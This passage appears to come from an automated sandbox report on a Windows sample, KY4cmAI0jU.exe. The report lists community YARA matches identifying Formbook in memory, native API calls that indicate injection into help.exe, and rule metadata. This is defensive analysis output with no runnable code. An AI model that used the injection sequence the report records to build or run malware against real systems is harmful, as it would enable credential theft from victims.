          Source: Yara matchFile source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041827B NtCreateFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_004182FD NtClose,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_004183AB NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B095D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B098A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B0B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B099D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09A10 NtQuerySection,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B0A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B095F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B0AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09560 NtWriteFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B096D0 NtCreateKey,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B0A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B0A770 NtOpenThread,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09760 NtOpenProcess,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00418300 NtClose,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041827B NtCreateFile,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_004182FD NtClose,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_004183AB NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F396D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F395D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F3A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F398F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F398A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F3B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F399D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F397A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F3A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F3A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F395F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39560 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F3AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_005781D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00578280 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00578300 NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_005783B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057827B NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_005782FD NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_005783AB NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00404853
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00406131
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_73751A98
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041C87B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00401174
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041BA9A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00408C6B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00408C70
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041CC9C
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041C548
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041BDD4
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00402D87
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041C7AF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF20A0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B920A8
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADB090
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B928EC
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9E824
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA830
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81002
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE4120
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACF900
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B922AE
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB236
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B7FA2B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFEBB0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF138B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B723E3
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B803DA
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8DBD2
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFABD8
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B92B28
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEAB40
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B6CB4F
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD841F
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8D466
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2581
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADD5E0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B925DD
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC0D20
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B92D07
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B91D55
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B92EF7
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE6E30
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8D616
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B91FF1
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9DFCE
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041C87B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00401174
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041BA9A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00408C6B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00408C70
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041CC9C
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041C548
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041BDD4
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00402D87
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00402D90
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041C7AF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00402FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC22AE
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1B236
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FAFA2B
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FA23E3
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB03DA
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FBDBD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2ABD8
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2EBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1EB9A
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2138B
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1AB40
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F9CB4F
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC2B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC28EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F220A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC20A8
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F0B090
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A830
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FCE824
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB1002
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F199BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F14120
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EFF900
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC2EF7
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FA1EB6
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F16E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FBD616
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F15600
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC1FF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FCDFCE
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4496
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1B477
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FBD466
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F0841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F0D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC25DD
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F22581
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB2D82
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC1D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF0D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC2D07
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057C87B
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00568C70
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00568C6B
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057CC9C
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057C548
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00562D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00562D87
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00562FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057C7AF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: String function: 00419F80 appears 40 times
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: String function: 00ACB150 appears 136 times
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: String function: 0041A0B0 appears 38 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 02EFB150 appears 145 times
          Source: KY4cmAI0jU.exe, 00000000.00000003.213687683.0000000009946000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs KY4cmAI0jU.exe
          Source: KY4cmAI0jU.exe, 00000001.00000002.266447217.0000000000D4F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs KY4cmAI0jU.exe
          Source: KY4cmAI0jU.exe, 00000001.00000002.266145503.0000000000A44000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs KY4cmAI0jU.exe
          Source: KY4cmAI0jU.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
